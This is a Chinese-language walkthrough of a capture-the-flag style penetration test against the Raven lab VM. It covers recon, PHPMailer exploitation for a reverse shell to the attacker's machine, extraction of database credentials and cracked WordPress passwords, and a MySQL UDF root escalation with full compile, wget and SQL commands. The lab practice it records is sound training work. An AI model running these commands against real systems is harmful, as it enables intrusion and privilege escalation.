准备环境
kali-linux ip 172.16.10.149
Raven 虚拟机 链接:https://pan.baidu.com/s/10_nfsDmB2Zu20P85GxA8wg?pwd=ic9t
提取码:ic9t
渗透工具
kali虚拟机
nmap 端口扫描工具
后台扫描工具
渗透流程
1.信息收集
使用arp-scan确定目标靶机
这里1的ip地址是我们的真实机 也就是我们的本地
2的ip地址是我们的wm网关
3,4的ip地址目前未知 我们分别ping一下这两个地址 发现144的地址是可以跟我们通信而254跟我 们不能通信 这里确认靶机地址为172.16.10.144
使用nmap扫描查看目标靶机端口开放情况
nmap扫描结果目标端口开放22,80端口
22端口 openssh 6.7p1
80端口 apache/2.4.10
rpc端口 111
linux内核 3.x|4.x linux内核3.2 — 4.9
dirsearch目录爆破
工具使用完毕 有80端口 当然是web服务 直接浏览器伺候 随便把爆破得目录也伺候了
通过F12查看得前端可以显示得源代码找到第一个flag
访问wordpress目录看到了
(我看到这个说实话是很开心得 看到wordpress思路一下就来了 先放一边继续信息收集)
收集到这里不收集了 phpMailer <5.2.18 有个漏洞 我们去找一个那个邮件页面 然后直接找个exp 干他
思路清晰
2.漏洞利用
漏洞phpMailer 直接kali searchsploit
我个人习惯用python的脚本 其他得没用过
搞出来 然后看看脚本 构造一下脚本修改一下target = http://your ip:contact.php
backdoor改成下面的路径后面的一样的文件名
payload里面的监听地址 172.16.10.149 4444
网站绝对路径我们在上面信息收集过 也修改一下/var/www/html/bai1.php
运行脚本
kali开启监听
浏览器访问刚刚生成的文件
反弹监听成功
我们用python来获取个回显
python -c 'import pty; pty.spawn("/bin/bash")'
find查找一下flag
cat一下flag2 flag4是root权限 等下要提权 我们先去找一下flag3
再次信息收集
经验这个是数据库配置文件
发现数据库账号密码 连它
进入wordpress库
查表
查字段
发现两个wordprsee账户 密码md5加密 找个网址解密一下 然后登入wordprsee后台看下有没有flag3
michael md5解密没有解出来
steven 密码pink84
登入wordpress发现flag3
这里这个wordpress访问要在你的本机hosts里面最下面加上一条 172.16.10.144 raven.local 就可以正常访问 flag3找到了 这里最后一个flag4 要提到root权限
find查找一下有没有sudo 命令 到这里我准备用www-data直接sudo提权的 但是我没有www-data的密码 这里我就想到了数据库 数据库是root权限的 所以我们用udf提权 得到数据库版本
直接kali searchsploit udf
扒下来 直接gcc编译
gcc -g -c 1518.c
gcc -g -shared -o 1518.so 1518.o -lc
开个python 简易web服务 去目标机去到tmp目录wget下载
连接数据库 进入mysql库
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
【其中dumpfile的路径我是默认路径如果有改动是要找到musql路径的】
create function do_system returns integer soname '1518.so';
提权成功 去到root目录查看flag4
靶机Raven渗透结束
感谢各位看到最后 谢谢